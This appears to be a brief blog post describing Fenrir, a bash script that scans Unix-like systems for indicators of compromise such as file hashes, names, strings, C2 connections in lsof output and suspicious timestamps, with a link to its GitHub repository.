Fenrir – Simple Bash Indicators of Compromise Scanner

Fenrir is a simple IOC scanner bash script. It allows scanning Linux/Unix/OSX systems for Indicators of Compromise (IOCs) Hashes MD5, SHA1 and SHA256 (using md5sum, sha1sum, sha -a 256), File Names ,Strings , C2 Server checking for C2 server strings in ‘lsof -i’ and ‘lsof -i -n’ output, Hot Time Frame.

Fenrir - Simple Bash IOC Scanner
Fenrir – Simple Bash IOC Scanner

What Fenrir does is:

  • Reads the IOC files
  • Takes a parameter as starting directory for the recursive walk
  • Checks C2 servers in lsof output
  • Checks for directory exclusions (configurable in the script header)
  • Checks for certain file extensions to check (configurable in the script header)
  • Checks the file name (full path) for matches in IOC files
  • Checks for file size exclusions (configurable in the script header)
  • Checks for certain strings in the file (via grep)
  • Checks for certain hash values
  • Checks for change/creation time stamp

User may search for the hash list and update once there is a new IOC published by any threat intelligence feed. This can be automated by subscribing to online Threat feed such as Alienvault OTX. The current hash list include a link to the APT and source of the IOC whether it is Microsoft , Symantec and more.

You can read more and download this tool over here: https://github.com/Neo23x0/Fenrir

Share